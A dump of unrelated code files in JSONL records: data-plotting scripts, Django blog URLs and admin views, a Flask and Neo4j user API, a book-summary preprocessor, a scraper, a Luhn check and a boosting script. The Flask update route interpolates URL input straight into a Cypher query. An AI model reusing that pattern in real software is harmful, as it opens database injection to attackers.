alpha=0.75)\r\n plt.xlabel('Value')\r\n plt.ylabel('Frequency')\r\n plt.title(col)\r\n plt.text(23, 45, r'$\\mu=15, b=3$')\r\n maxfreq = n.max()\r\n # Set a clean upper y-axis limit.\r\n # plt.ylim(ymax=np.ceil(maxfreq / 10) * 10 if maxfreq % 10 else maxfreq + 10)\r\n plt.show()\r\n\r\ndata = pd.read_csv(data_path)\r\n\r\n\r\nfig, ax = plt.subplots(1,1,figsize=(26,8))\r\ntmp = pd.DataFrame(data.groupby(['file_id', 'aug.road_type'])['series_num'].count().reset_index())\r\ntmp = tmp[0:30]\r\nm = tmp.pivot(index='aug.road_type', columns='file_id', values='series_num')\r\ns = sns.heatmap(m, linewidths=.1, linecolor='black', annot=True, cmap=\"YlGnBu\")\r\ns.set_title('Number of road_type category per file_id', size=16)\r\nplt.show()\r\n\r\n# print(data.columns)\r\n# print(data.describe())\r\n\r\nimport matplotlib.pyplot as plt\r\n# pd.options.display.mpl_style = 'default'\r\n# data.boxplot()\r\n\r\n\r\n\r\ncolumns = data.columns\r\n\r\npart_1 = ['vtti.accel_x',\r\n 'vtti.accel_y', 'vtti.accel_z', 'vtti.cruise_state',\r\n 'vtti.engine_rpm_instant', 'vtti.gyro_x', 'vtti.gyro_y', 'vtti.gyro_z',\r\n 'vtti.headlight', 'vtti.light_level', 'vtti.pedal_brake_state',\r\n 'vtti.pedal_gas_position', 'vtti.prndl', 'vtti.seatbelt_driver']\r\npart_2 = ['vtti.speed_network', 'vtti.steering_wheel_position',\r\n 'vtti.temperature_interior', 'vtti.traction_control_state',\r\n 'vtti.turn_signal', 'vtti.wiper']\r\n\r\nall_cols =part_1 + part_2\r\n\r\n# remove_cols = ['series_id', 'file_id', 'vtti.timestamp']\r\n# TARGETS_COLS = ['aug.road_type', 'aug.surfaceCondition', 'aug.lighting', 'aug.relationToJunction', 'aug.weather',\r\n# 'aug.locality']\r\n# data = data.drop(remove_cols + TARGETS_COLS)\r\n\r\n# disply_hist(data[part_1])\r\n# disply_hist(data[part_2])\r\n\r\nfor col in all_cols:\r\n disply_hist_1(data, col)\r\ndescribe = data.describe()\r\n\r\ndescribe.to_csv('./describe_no_clean.csv')","repo_name":"advahad/deep_can","sub_path":"util/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9567577466","text":"from . 
import views\nfrom django.urls import path, reverse_lazy\nfrom django.views.generic import CreateView\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib.auth.forms import UserCreationForm\n\n# Add URLConf. Note: django.contrib.auth.views ships no RegisterView, so the\n# register route uses a generic CreateView with UserCreationForm instead.\nurlpatterns = [\n    path('', views.PostListView.as_view(), name='post_list'),\n    path('register/', CreateView.as_view(form_class=UserCreationForm, template_name='registration/register.html', success_url=reverse_lazy('login')), name='register'),\n    path('login/', auth_views.LoginView.as_view(template_name='registration/login.html'), name='login'),\n    path('logout/', auth_views.LogoutView.as_view(template_name='registration/logged_out.html'), name='logout'),\n    path('post/<int:pk>/', views.PostDetailView.as_view(), name='post_detail'),\n]","repo_name":"Yakumwamba/django-blogging-app","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72247932579","text":"# abort comes from flask (the original mistakenly imported it from os)\nfrom flask import Flask, request, jsonify, redirect, render_template, abort\nfrom neo4j import GraphDatabase\nimport csv, json\n\n# establish the connection\nwith open(\"cred.txt\") as f1:\n data = csv.reader(f1, delimiter=\",\")\n for row in data:\n username = row[0]\n pwd = row[1]\n uri = row[2]\nprint(username, pwd, uri)\ndriver = GraphDatabase.driver(uri=uri, auth=(username, pwd))\nsession = driver.session()\napi = Flask(__name__)\n\n# In-memory id store (added: the original referenced an undefined `users` list)\nusers = []\n\n\n@api.route(\"/create/<user>\", methods=[\"GET\", \"POST\"])\ndef create_user(user):\n # the `user` path segment matches the function signature; the payload itself\n # comes from the JSON body\n if not request.json or 'name' not in request.json:\n abort(400)\n new_user = {\n 'id': (users[-1]['id'] + 1) if users else 1,\n 'name': request.json['name'],\n 'email': request.json['email'],\n 'gender': request.json['gender'],\n 'dob': request.json['dob'],\n 'mobilenumber': request.json[\"mobilenumber\"],\n 'city': request.json['city'],\n 'country': request.json['country'],\n # key renamed to match the $studyfield query parameter below\n 'studyfield': request.json['studyfield'],\n 'qualdetails': request.json['qualdetails'],\n 'unidetails': request.json['unidetails'],\n 'position': request.json['position'],\n 'description': request.json.get('description', \"\"),\n 'done': False\n }\n\n q1 = \"\"\"\n create (n:User{NAME:$name,EMAIL:$email,GENDER:$gender,DOB:$dob,MOBILENUMBER:$mobilenumber,CITY:$city,COUNTRY:$country,qualdetails:$qualdetails,unidetails:$unidetails,studyfield:$studyfield,position:$position})\n \"\"\"\n\n try:\n session.run(q1, new_user)\n users.append(new_user)\n return (\n f\"user node is created with username {new_user['name']}\")\n except Exception as e:\n return (str(e))\n\n\n@api.route(\"/update/<nodename>&<newname>\", methods=[\"GET\", \"POST\"])\ndef update_nodename(nodename, newname):\n # note: interpolating user input into Cypher is injection-prone; query\n # parameters would be safer\n q1 = f\"\"\"\n match (n) where n.name=\"{nodename}\" set n.name=\"{newname}\" return n.name\n \"\"\"\n results = session.run(q1)\n return (f\"{nodename} node name is updated to {newname}\")\n\n\nif __name__ == \"__main__\":\n api.run(port=5050)\n","repo_name":"kaveshdgr8/neo4jwithflask","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2817108673","text":"import pandas as pd\nimport json\nimport re\nimport csv\nfrom tqdm import tqdm\n\n\ndef clean_summary(text):\n text = re.sub(\"\\'\", \"\", text)\n text = re.sub(\"[^a-zA-Z]\", \" \", text)\n text = ' '.join(text.split())\n text = text.lower()\n return text\n\n\ndef main():\n data = []\n\n with open(\"booksummaries.txt\", 'r', encoding='utf-8') as f:\n reader = csv.reader(f, dialect='excel-tab')\n for row in tqdm(reader):\n data.append(row)\n\n book_index = []\n book_id = []\n book_author = []\n book_name = []\n summary = []\n genre = []\n a = 1\n for i in 
tqdm(data):\n book_index.append(a)\n a = a + 1\n book_id.append(i[0])\n book_name.append(i[2])\n book_author.append(i[3])\n genre.append(i[5])\n summary.append(i[6])\n\n df = pd.DataFrame({'Index': book_index, 'ID': book_id, 'BookTitle': book_name, 'Author': book_author,\n 'Genre': genre, 'Summary': summary})\n\n # Cleaning up Genres\n df.isna().sum()\n\n df = df.drop(df[df['Genre'] == ''].index)\n df = df.drop(df[df['Summary'] == ''].index)\n\n genres_cleaned = []\n for i in df['Genre']:\n genres_cleaned.append(list(json.loads(i).values()))\n df['Genres'] = genres_cleaned\n\n # Cleaning up summaries\n df['clean_summary'] = df['Summary'].apply(lambda x: clean_summary(x))\n\n # saving to json\n save_kb(df)\n\n\ndef save_kb(df):\n cols_to_include = ['ID', 'BookTitle', 'Author', 'Genres', 'clean_summary']\n df_subset = df[cols_to_include]\n\n # save the DataFrame subset as a JSON file\n df_subset.to_json('book_summaries.json', orient='records')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rigrergl/nlp_portfolio","sub_path":"chatbot/knowledge_base/gen_books_kb.py","file_name":"gen_books_kb.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36536915030","text":"from lxml import etree\n# print(html_data)\nimport requests\nimport codecs\ndef saveUrlAsUtf(base):\n response = requests.get(\n 'http://cmpbook.com/searchbook.php?pagestart='+str(base)+\"&action=search&title=&series=%BE%AD%B5%E4%D4%AD%B0%E6&isbn=&publictime=&storetime=&searchword=&s1=&s2=&Submit=%CB%D1%CB%F7&orderby=publictime\")\n html = str(response.content.decode('gb2312').encode('utf-8'), 'utf-8')\n file = codecs.open(\"SearchReslutPages/\"+base.__str__()+\".html\", \"w\", \"utf-8\")\n file.write(html)\n file.close()\n# saveUrlAsUtf()\ndef xpath():\n # html = etree.parse('text.html', etree.HTMLParser())\n # result = etree.tostring(html)\n # html_data = html.xpath('/html/body/table/tbody/tr/td/table/tbody/tr/td/table/tbody/tr')\n hxml = etree.HTML(open('text.html', 'r').read())\n htree = etree.ElementTree(hxml)\n\n html_data = htree.xpath(\"/html/body/table/tbody/tr/td\")\n\n data_list = html_data[8].xpath(\"//span/text()\")\n for d in data_list:\n print(d)\n\ndef savePages():\n for i in range(1, 85):\n # baseUrl = 'http://cmpbook.com/searchbook.php?pagestart=' + i.__str__() + '&action=search&title=&series=%BE%AD%B5%E4%D4%AD%B0%E6&isbn=&publictime=&storetime=&searchword=&s1=&s2=&Submit=%CB%D1%CB%F7&orderby=publictime'\n saveUrlAsUtf(i)\n print(\"Processing\"+i.__str__)\n # resp = requests.get(baseUrl)\n # html = str(resp.content.decode('gb2312').encode('utf-8'), 'utf-8')\n\n\nsavePages()\n# print(html)\n\n# f.write(html)\n","repo_name":"c3730915/Python_spider","sub_path":"GetEnglishBookLists/getPages.py","file_name":"getPages.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"13010059360","text":"import re\nclass Luhn:\n def __init__(self, card_num):\n self.card_num = card_num\n \n def valid(self):\n space_less = re.sub(r'\\s+', '', self.card_num)\n if not all([s.isdigit() for s in space_less]) or len(space_less) <= 1:\n return False \n int_list = [int(s) for s in space_less]\n doubled = [(l*2) if i % 2 != 0 \n else l for i, l in enumerate(reversed(int_list))]\n final = [(d-9) if d > 9 else d for d in doubled]\n return sum(final) % 10 == 0\n 
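\n\n# A minimal usage sketch (added; the sample numbers below are the classic\n# exercise values, assumed here purely for illustration):\nif __name__ == '__main__':\n assert Luhn('055 444 285').valid() # a valid Luhn string\n assert not Luhn('055 444 286').valid() # changing the last digit breaks the checksum\n assert not Luhn('0').valid() # single characters are rejected by the length check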
","repo_name":"PetaGb/ExercismSolutions","sub_path":"Luhn/luhn.py","file_name":"luhn.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21904132794","text":"import numpy as np\nimport cPickle\nimport splitdata\nimport boost_mod as boost\nimport pdb\n\nproject_path = '/proj/ar2384/picorna/'\nvirus_family = 'rhabdo'\n\nk = 8\nM = 4\nfor m in range(M):\n input_file = project_path+'cache/%s_temp/%s_virii_data_%d_%d.pkl' % (virus_family, virus_family, k, m)\n f = open(input_file,'r')\n Xt = cPickle.load(f)\n Yt = cPickle.load(f)\n kmer_dict = cPickle.load(f)\n f.close()\n\n # make Xt, Yt memory-efficient\n Xt = Xt.astype('int16')\n Yt = Yt.astype('int16')\n Nt = Yt.shape[1]\n T = 20\n predicted_labels = np.zeros((Nt,T),dtype='int16')\n\n # number of folds of cross validation\n Nfold = 10\n\n # split the data indices into 10 random disjoint sets\n Fidx = splitdata.cv_multiclass_fold(Yt,Nfold)\n\n for fold in range(Nfold):\n params = (fold,k,m,T)\n # using each set as the test set and the rest as train sets\n # split the data and run boosting\n X, Y, x, y, Idx = splitdata.cv_split(Xt,Yt,Fidx[fold])\n predicted_labels = boost.adaboost(X, Y, x, y, predicted_labels, Fidx[fold], params, kmer_dict, model='tree', virus_family=virus_family)\n\n output_file = project_path+'cache/%s_temp/%s_virii_test_output_%d_%d.pkl' % (virus_family, virus_family, k, m)\n f = open(output_file,'w')\n cPickle.Pickler(f,protocol=2).dump(Fidx)\n cPickle.Pickler(f,protocol=2).dump(predicted_labels)\n f.close()\n","repo_name":"mikedewar/picorna","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"32021072113","text":"import config as cfg\nimport pandas as pd\nimport sys\nimport math\n\n\ndef main():\n calculate_regions()\n # calculate_sequences()\n # calculate_regions_size()\n\n\ndef calculate_regions_size():\n regs = pd.read_csv(cfg.data['sequences_regions'] + '/search_in_disprot.tsv', sep='\\t').drop_duplicates(\n subset=['disprot_id'], keep=False)\n print(regs)\n\n\ndef calculate_sequences():\n # added temporary header to calculate this\n ids1 = pd.read_csv(cfg.data['filtering'] + '/filter-needle-identity.txt', sep='\\t')['id1']\n\n ids2 = pd.read_csv(cfg.data['filtering'] + '/filter-needle-identity.txt', sep='\\t')['id2']\n\n ids = pd.concat([ids1, ids2]).drop_duplicates()\n df = pd.DataFrame()\n df['disprot_id'] = ids\n calculate_regions()\n\n\ndef calculate_regions():\n # ids1 = pd.read_csv(cfg.data['alignments'] + '/global_triangular_matrix.csv', sep='\\t')['id1']\n #\n # ids2 = pd.read_csv(cfg.data['alignments'] + '/global_triangular_matrix.csv', sep='\\t')['id2']\n #\n # ids = pd.concat([ids1, ids2]).drop_duplicates()\n # df = pd.DataFrame()\n # df['acc'] = ids\n\n # ids1 = pd.read_csv(cfg.data['filtering'] + '/filter-needle-identity.txt', sep='\\t')['id1']\n #\n # ids2 = pd.read_csv(cfg.data['filtering'] + '/filter-needle-identity.txt', sep='\\t')['id2']\n #\n # ids = pd.concat([ids1, ids2]).drop_duplicates()\n # df = pd.DataFrame()\n # df['disprot_id'] = ids\n\n # reg = pd.read_csv(cfg.data['sequences_regions'] + '/search_in_disprot.tsv', sep='\\t')\n # merged_df = reg.merge(df, on='disprot_id')\n # merged_df = reg.drop_duplicates(subset=['acc', 'start', 'end'], keep=False)\n # size = len(merged_df)\n # tot_reg = pd.read_csv(cfg.bash['results'] + 
'/all-global-needle.txt', sep='\\t')['reg2'].dropna()\n tot_reg = pd.read_csv(cfg.data['filtering'] + '/filter-needle-identity.txt', sep='\\t')['reg1'].dropna()\n\n count = 0\n for row in tot_reg:\n print(row)\n\n values = row.split(',')\n for value in values:\n count += 1\n print(count)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"mb925/homologsAnalysis","sub_path":"src/calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72289489699","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import View\nfrom django.urls import reverse_lazy\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.contrib import messages\nfrom django.core.mail import send_mail, EmailMessage\nfrom django.conf import settings\nfrom rest_framework import generics\nfrom .models import *\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\n# from django.views import View\nfrom django.forms.models import modelformset_factory\nfrom django.template import RequestContext\nimport os\n\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import (\n SubServicesForm,\n TestimonialForm,\n TestimonialUpdateForm,\n SliderHomeForm,\n AboutForm,\n ServicesForm,\n ServicesUpdateForm,\n ServiceTypeForm,\n PortFolioForm,\n FeaturesForm,\n TeamForm,\n ClientsForm,\n ContactForm,\n ContactMessageForm,\n PortFolioForm,\n PortFolioUpdateForm,\n\n \n)\n\n# for sending data to the admin mail address\ndef send_mail_all(context, email):\n content = {\"%s: %s\" % (key, value) for (key, value) in context.items()}\n content = \"\\n\".join(content)\n\n send_mail(\n 'Contact Message', # subject\n content, # message\n settings.EMAIL_HOST_USER, # from email\n ['arjunkhattri83@gmail.com'],\n fail_silently=False)\n\n@login_required\ndef dashboard(request):\n business_title = SliderHome.objects.all()\n context = {'business_title': business_title}\n return render(request, 'dashboard/dashboard.html', context)\n\n\n@login_required\ndef testimonials_list(request):\n review_list = Testimonials.objects.all()\n context = {'review_list':review_list}\n return render(request, 'testimonials/list.html', context)\n \n@login_required\ndef create_testimonials(request):\n create_review = Testimonials.objects.all()\n if request.method == 'POST':\n form = TestimonialForm(request.POST or None, request.FILES)\n try:\n if form.is_valid():\n form.save()\n messages.success(request,('New Testimonail created! 
'))\n return redirect('testimonials_list')\n else:\n messages.error(request, 'Invalid Testimonial details')\n return redirect('create_testimonials')\n except:\n if Testimonials.objects.filter(author__iexact = form.cleaned_data['author']).exists():\n messages.error(request, 'Testimonial already exists')\n return redirect('testimonails_list')\n else:\n context = {'create_review': create_review}\n return render(request, 'testimonials/create.html', context)\n\n@login_required\ndef testimonials_details(request, name):\n review_details = Testimonials.objects.get(author=name)\n context = {'review_details': review_details }\n return render(request, 'testimonials/detail.html',context)\n\n\n@login_required\ndef update_testimonials(request, name):\n review_update = Testimonials.objects.get(author=name)\n if request.method == 'POST':\n form = TestimonialUpdateForm(request.POST or None, request.FILES, instance=review_update)\n try:\n if form.is_valid():\n review_update.save()\n else:\n review_update.quote = request.POST.get('quote')\n review_update.save()\n messages.success(request, \"Testimonials Updated\")\n return redirect('testimonials_list')\n except:\n messages.error(request, \"Unable to update testimonial\")\n return redirect('testimonials_list')\n\n elif request.method == 'GET':\n context={'review_update': review_update}\n return render(request, 'testimonials/update.html', context)\n\n\n@login_required\ndef delete_testimonials(request, author):\n testimonials = Testimonials.objects.get(author=author)\n testimonials.delete()\n messages.success(request, \"Testimonials Deleted!\")\n return redirect('testimonials_list')\n\n\n@login_required\ndef carousel_list(request):\n carousel= SliderHome.objects.all()\n context = {'carousel': carousel}\n return render(request, 'page/carousel/list.html', context)\n\n\n\n\n@login_required\ndef carousel_create(request):\n if request.method == \"POST\":\n form = SliderHomeForm(request.POST or None, request.FILES)\n try:\n if form.save():\n form.save()\n messages.success(request, 'HomeSlider details added')\n return redirect('carousel_list')\n else:\n messages.error(request, 'Invalid home details entered')\n return redirect('carousel_list')\n except:\n return redirect('carousel_list')\n else:\n return render(request, 'page/carousel/create.html') \n\n@login_required\ndef carousel_detail(request, name): \n carouseldetail = SliderHome.objects.get(title=name)\n context = {'carouseldetail':carouseldetail}\n return render(request, 'page/carousel/detail.html', context)\n\n@login_required\ndef carousel_update(request, name):\n carouselupdate = SliderHome.objects.get(title=name) \n if request.method=='POST':\n form = SliderHomeForm(request.POST or None, request.FILES, instance=carouselupdate)\n if form.is_valid():\n form.save()\n messages.success(request, 'carousel information updated!')\n return redirect('carousel_list')\n else:\n messages.error(request, 'Invalid home information!')\n return redirect('carousel_list')\n else:\n context = {'carouselupdate': carouselupdate}\n return render (request, 'page/carousel/update.html', context)\n\n\n@login_required\ndef carousel_delete(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(SliderHome, id = id)\n\tif request.method ==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('carousel_list')\n\n\treturn render (request, 'page/carousel/delete.html', context)\n\n@login_required\ndef about_info(request):\n info = About.objects.all().first()\n context = {'info': info}\n return render(request, 'page/about/view.html', 
context)\n\n@login_required\ndef about_create(request):\n if request.method == 'POST':\n form = AboutForm(request.POST or None, request.FILES)\n try:\n if form.save():\n form.save()\n messages.success(request, 'About Details Added')\n return redirect('about_info')\n else:\n messages.error(request, 'Invalid About Details Entered!!')\n return redirect('about_info')\n except:\n return redirect('about_info')\n else:\n return render(request, 'page/about/create.html')\n\n@login_required\ndef about_update(request):\n info = About.objects.all().last()\n if request.method == 'POST':\n form = AboutForm(request.POST or None, request.FILES, instance = info)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'About Details Updated')\n return redirect('about_info')\n else:\n messages.error(request, 'Invalid About Details Entered')\n return redirect('about_info')\n except:\n return redirect('about_info')\n else:\n context = {'info': info}\n return render(request,'page/about/update.html', context)\n\n\n# @login_required\n# def service_type(request):\n# subtype = ServiceType.objects.all()\n# context = {'subtype': subtype}\n# return render(request, 'page/services/subtype/list.html', context)\n\n@login_required\ndef create_servicetype_list(request):\n subtype = ServiceType.objects.all()\n context = {'subtype': subtype}\n if request.method == 'POST':\n form = ServiceTypeForm(request.POST or None, request.FILES)\n try:\n if form.save():\n form.save()\n messages.success(request, 'Service type added')\n return redirect('create_servicetype')\n\n else:\n messages.error(request, 'Invalid Service Type Entered!')\n return redirect('create_servicetype')\n except:\n return redirect('create_servicetype')\n else:\n return render(request, 'page/services/subtype/create.html', context)\n\n@login_required\ndef delete_servicetype(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(ServiceType, id = id)\n\tif request.method ==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('create_servicetype')\n\n\treturn render (request, 'page/services/subtype/delete.html', context)\n\n@login_required\ndef services_list(request):\n subservices= SubServiceslist.objects.all()\n context = {'subservices':subservices}\n services = Services.objects.all()\n context = {'subservices': subservices, 'services': services}\n return render(request, 'page/services/list.html', context)\n\n\n# class ServiceListView(ListView):\n# model = Services\n# template_name = 'page/services/list.html'\n# context_object_name = 'services'\n \n\nclass ServicesCreateView(View):\n\n def get(self, request, *args, **kwargs):\n form = ServicesForm()\n return render(request, 'page/services/create.html', {'form':form})\n \n def post(self, request, *args, **kwargs):\n if request.method == 'POST':\n form = ServicesForm(request.POST or None, request.FILES)\n if form.is_valid():\n post = form.save(commit=False)\n post.save()\n\n for item in request.FILES.getlist('images'):\n longthumb = Preview_Images.objects.create(longthumb=item, service=post)\n longthumb.save()\n \n return redirect('services_list')\n else:\n messages.error(request, 'Invalid Services Details Entered')\n return redirect('services_list')\n else:\n return render(request, 'page/services/create.html')\n\n\nclass ServiceDetailView(DetailView):\n model = Services\n form_class = ServicesForm\n template_name = 'page/services/detail.html'\n\n\nclass ServiceUpdateView(UpdateView):\n model = Services\n form_class = ServicesUpdateForm\n template_name = 'page/services/update.html'\n\n def post(self, 
request, *args, **kwargs):\n services_qs = Services.objects.filter(pk=kwargs['pk'])\n \n if services_qs.exists():\n services = services_qs.first()\n form = self.form_class(request.POST or None, instance=services)\n if form.is_valid():\n post = form.save(commit=False)\n post.shortthumb = request.FILES.get('shortthumb')\n post.save()\n \n\n if len(request.FILES.getlist('images'))>0:\n longthumb = Preview_Images.objects.filter(service=post)\n if longthumb.exists():\n for images in longthumb:\n images.delete()\n for item in request.FILES.getlist('images'):\n images = Preview_Images.objects.create(longthumb=item, service=post)\n images.save()\n else:\n for item in request.FILES.getlist('images'):\n images = Preview_Images.objects.create(longthumb=item, service=post)\n images.save()\n \n return redirect('services_list')\n \n else:\n return redirect('update_services', pk=kwargs['pk'])\n else:\n return render(request, 'page/services/update.html', {\"services_qs\":services_qs})\n\nclass ServiceDeleteView(DeleteView):\n model = Services\n success_url = reverse_lazy('services_list')\n template_name = 'page/services/delete.html'\n\n # def get(self, request, *args, **kwargs):\n # return self.post(request, *args, **kwargs)\n \n \n# @login_required\n# def subservices_list(request):\n# subservices= SubServiceslist.objects.all()\n# context = {'subservices':subservices}\n# return render(request, 'page/services/subservices/list.html', context)\n\n@login_required\ndef subservices_detail(request, name): \n subservices = SubServiceslist.objects.filter(servicetitle=name)\n if subservices.exists():\n subservice =subservices.first()\n context = {'subservices':subservice}\n return render(request, 'page/services/subservices/detail.html', context)\n\n# @login_required\n# def create_subservices(request):\n# if request.method == 'POST':\n# form = SubServicesForm(request.POST or None, request.FILES)\n# try:\n# if form.is_valid():\n# form.save()\n# messages.success(request, 'Subservices Details Added')\n# return redirect('services_list')\n# else:\n# messages.error(request, 'Invalid Subservices Details Entered')\n# return render ('services_list')\n# except:\n# return redirect('services_list')\n \n# elif request.method == 'GET':\n# form = SubServicesForm()\n# context = { 'form':form}\n \n# return render(request, 'page/services/subservices/create.html', context)\n\nclass SubServicesCreateView(View):\n\n def get(self, request, *args, **kwargs):\n form = SubServicesForm()\n return render(request, 'page/services/subservices/create.html', {'form':form})\n \n def post(self, request, *args, **kwargs):\n if request.method == 'POST':\n form = SubServicesForm(request.POST or None, request.FILES)\n if form.is_valid():\n # post = form.save(commit=False)\n form.save()\n \n return redirect('services_list')\n else:\n messages.error(request, 'Invalid SubServices Details Entered')\n return redirect('services_list')\n else:\n return render(request, 'page/services/subservices/create.html')\n\n# @login_required\n# def update_subservices(request, pk):\n \n# subservices = SubServiceslist.objects.filter(id=pk)\n \n# s = subservices.first()\n# if request.method == 'POST':\n# form = SubServicesForm(request.POST or None, request.FILES, instance=s)\n# try:\n# if form.is_valid():\n# form.save()\n# messages.success(request, 'Subservices Details Updated!')\n# return redirect('services_list')\n# else:\n# messages.error(request, 'Invalid Subservice Details')\n# return render('services_list')\n# except:\n# return redirect('services_list')\n# elif 
request.method == 'GET':\n# form = SubServicesForm()\n# context = {'form':form}\n# return render(request, 'page/services/subservices/update.html', context)\n\nclass SubServiceUpdateView(UpdateView):\n model = SubServiceslist\n form_class = SubServicesForm\n template_name = 'page/services/subservices/update.html'\n\n def post(self, request, *args, **kwargs):\n qs = SubServiceslist.objects.filter(pk=kwargs['pk'])\n \n if qs.exists():\n subservices = qs.first()\n form = self.form_class(request.POST or None, instance=subservices)\n if form.is_valid():\n # post = form.save(commit=False)\n # post.shortthumb = request.FILES.get('shortthumb')\n form.save() \n \n return redirect('services_list')\n \n else:\n return redirect('update_subservices', pk=kwargs['pk'])\n else:\n return render(request, 'page/services/subservices/update.html', {'qs':qs})\n\n\n@login_required\ndef delete_subservices(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(SubServiceslist, id = id)\n\tif request.method ==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('services_list')\n\n\treturn render (request, 'page/services/subtype/delete.html', context)\n\n@login_required\ndef portfolio_list(request):\n portfoliolist = Portfolio.objects.all()\n context = {'portfoliolist': portfoliolist}\n return render(request, 'page/portfolio/list.html', context)\n\n\nclass PortfolioView(CreateView):\n\n def get(self, request, *args, **kwargs):\n form = PortFolioForm()\n return render(request, 'page/portfolio/create.html', {'form':form})\n\n def post(self, request, *args, **kwargs): \n if request.method == 'POST':\n form = PortFolioForm(request.POST or None, request.FILES)\n if form.is_valid():\n post = Portfolio.objects.create(title=request.POST.get('title'), \n status=form.cleaned_data.get('status'), \n description=request.POST.get('description'),\n )\n post.save()\n \n for item in request.FILES.getlist('images'):\n image = PortFolioImage.objects.create(image=item, portfolio=post)\n image.save() \n return redirect('portfolio_list')\n \n else:\n messages.error(request, 'Invalid portfolio information!')\n return redirect('portfolio_list')\n \n else:\n return render(self.request, 'page/portfolio/create.html')\n \nclass PortfolioDetail(DetailView):\n model = Portfolio\n template_name = 'page/portfolio/detail.html'\n\n\n\nclass PortfolioUpdateView(UpdateView):\n model = Portfolio\n form_class = PortFolioUpdateForm\n template_name ='page/portfolio/update.html'\n\n def post(self, request, *args, **kwargs):\n portfolio_qs = Portfolio.objects.filter(pk=kwargs['pk'])\n if portfolio_qs.exists():\n portfolio = portfolio_qs.first()\n form = self.form_class(request.POST or None, instance=portfolio)\n if form.is_valid():\n post = form.save(commit=False)\n post.save()\n if len(request.FILES.getlist('images'))>0:\n images = PortFolioImage.objects.filter(portfolio=post)\n if images.exists():\n for image in images:\n image.delete()\n for item in request.FILES.getlist('images'):\n image = PortFolioImage.objects.create(image=item, portfolio=post)\n image.save()\n else:\n for item in request.FILES.getlist('images'):\n image = PortFolioImage.objects.create(image=item, portfilio=post)\n image.save()\n \n return redirect('portfolio_list')\n else:\n return redirect('update_portfolio', pk=kwargs['pk'])\n # return redirect('portfolio_list')\n else:\n return redirect('portfolio_list')\n\n\nclass PortfolioDeleteView(DeleteView):\n model = Portfolio\n success_url = reverse_lazy('portfolio_list')\n template_name = 'page/portfolio/delete.html'\n\n # def get(self, 
request, *args, **kwargs):\n # return self.post(request, *args, **kwargs)\n \n \n\n\n\n\n@login_required\ndef features_list(request):\n feature = Features.objects.all()\n context = {'feature':feature}\n return render(request, 'page/features/list.html', context)\n\n@login_required\ndef create_features(request):\n if request.method == 'POST':\n form = FeaturesForm(request.POST or None, request.FILES)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Features Added')\n return redirect('features_list')\n else:\n messages.error(request, 'Failed to add the feature!')\n return redirect('features_list')\n except:\n return redirect('features_list')\n else:\n return render(request, 'page/features/create.html')\n\n@login_required\ndef feature_detail(request, name):\n feature = Features.objects.get(title=name)\n context = {'feature': feature}\n return render(request, 'page/features/details.html', context)\n\n@login_required\ndef update_features(request, name):\n feature = Features.objects.get(title=name)\n if request.method == 'POST':\n form = FeaturesForm(request.POST or None, request.FILES, instance=feature)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Feature updated succesfully')\n return redirect('features_list')\n else:\n messages.error(request, 'Failed to update features')\n return redirect('features_list')\n except:\n return redirect('features_list')\n else:\n context = {'feature':feature}\n return render(request, 'page/features/update.html', context)\n\n@login_required\ndef features_delete(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(Features, id = id)\n\tif request.method ==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('features_list')\n\n\treturn render (request, 'page/features/delete.html', context)\n\n\n@login_required\ndef team_list(request):\n teamlist = Team.objects.all()\n context = {'teamlist':teamlist}\n return render(request, 'page/team/list.html', context)\n\n@login_required\ndef create_team(request):\n if request.method == 'POST':\n form = TeamForm(request.POST or None, request.FILES)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Team Details Added Successfully')\n return redirect('team_list')\n else:\n messages.error(request, 'Failed to Add Team Details')\n return redirect('team_list')\n except:\n return redirect('team_list')\n else:\n return render(request, 'page/team/create.html')\n\n\n@login_required\ndef team_detail(request, string):\n team = Team.objects.get(name=string)\n context = {'team': team}\n return render(request, 'page/team/details.html', context)\n\n@login_required\ndef update_team(request, string):\n team = Team.objects.get(name=string)\n if request.method == 'POST':\n form = TeamForm(request.POST or None, request.FILES, instance = team)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'Team Details Updated')\n return redirect('team_list')\n else:\n 